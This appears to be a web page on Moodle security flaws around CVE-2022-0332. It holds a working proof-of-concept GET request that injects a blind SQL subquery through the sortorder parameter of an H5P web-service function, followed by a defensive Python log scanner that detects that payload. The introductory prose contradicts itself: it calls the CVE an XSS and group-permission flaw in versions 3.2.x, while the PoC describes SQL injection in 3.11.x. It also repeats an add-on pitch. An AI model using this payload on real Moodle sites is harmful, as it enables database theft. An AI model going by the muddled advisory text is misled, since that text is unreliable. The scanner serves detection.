All Moodle installations on the affected server versions were patched to prevent exploitation. If you suspect your site may have been vulnerable, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Moodle was also found to be vulnerable to cross-site request forgery attacks in 3.2.4. A malicious user could execute a request against one of your Moodle installations to change the site’s settings or add an administrator.
In versions 3.2.2 to 3.2.4, a cross-site scripting risk was identified that could lead to arbitrary code execution.

An unauthenticated user could access the ‘Add and remove groups’ page and add themselves to a group.

Moodle was also found to be vulnerable to cross-site request forgery attacks in 3.2.2. A malicious user could execute a request against one of your Moodle installations to change the site’s settings or add an administrator.

- CVE-2022-0332
- The Moodle team has confirmed a vulnerability in the 3.2.4, 3.2.2 and 3.2 versions of Moodle which allows for XSS attacks to be executed against all installations on the server using that version of Moodle.
- The vulnerability is related to the "Add and remove groups" functionality, which does not verify that a user is authorized to change their group membership, allowing attackers to add users to groups without their knowledge or consent.
- To prevent exploitation via this vulnerability, please upgrade your Moodle installation immediately through a secure patching process (see below). If you are unable to upgrade your installation at this time, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Installing Breach Monitor

If you suspect your site may have been vulnerable, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Exploit

# Exploit Title: Moodle 3.11.4 - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC

```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

```
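
A defender-side check for the request shown above, as an added example (not part of the original advisory or of Moodle's code): it scans access-log lines for calls to `mod_h5pactivity_get_user_attempts` whose `sortorder` carries anything other than a sort direction. The ASC/DESC allowlist, the combined log format and the sample lines are assumptions; calls sent via POST leave no query string in the log and are not covered.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Web-service function and parameter names taken from the PoC request on this page.
WSFUNCTION = "mod_h5pactivity_get_user_attempts"
ALLOWED_SORT = {"", "asc", "desc"}  # assumption: the field should only hold a sort direction

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_sortorder(log_line):
    """Return decoded sortorder values that are not a plain sort direction,
    or [] when the line is not a call to the affected function."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if WSFUNCTION not in query.get("wsfunction", []):
        return []
    # parse_qs URL-decodes once and keeps repeated parameters, so every copy is checked.
    return [v for v in query.get("sortorder", []) if v.strip().lower() not in ALLOWED_SORT]

def scan(lines):
    """Return (line_number, client_ip, values) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = suspicious_sortorder(line)
        if bad:
            hits.append((n, line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log (documentation IP ranges, placeholder token).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2022:10:00:01 +0000] "GET /webservice/rest/server.php?wstoken=TOKEN&wsfunction=mod_h5pactivity_get_user_attempts&h5pactivityid=1&sortorder=DESC HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Jan/2022:10:00:05 +0000] "GET /webservice/rest/server.php?wstoken=TOKEN&wsfunction=mod_h5pactivity_get_user_attempts&h5pactivityid=1&sortorder=%28SELECT%205080%20UNION%20SELECT%204100%29 HTTP/1.1" 200 98',
    '192.0.2.10 - - [30/Jan/2022:10:00:09 +0000] "GET /webservice/rest/server.php?wstoken=TOKEN&wsfunction=core_webservice_get_site_info HTTP/1.1" 200 2048',
    '192.0.2.44 - - [30/Jan/2022:10:00:12 +0000] "GET /course/view.php?id=2&sortorder=name HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for n, ip, values in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent sortorder={values!r}")
```
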

![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")

# Reference
 * [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
 * [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 14:09:00 UTC

References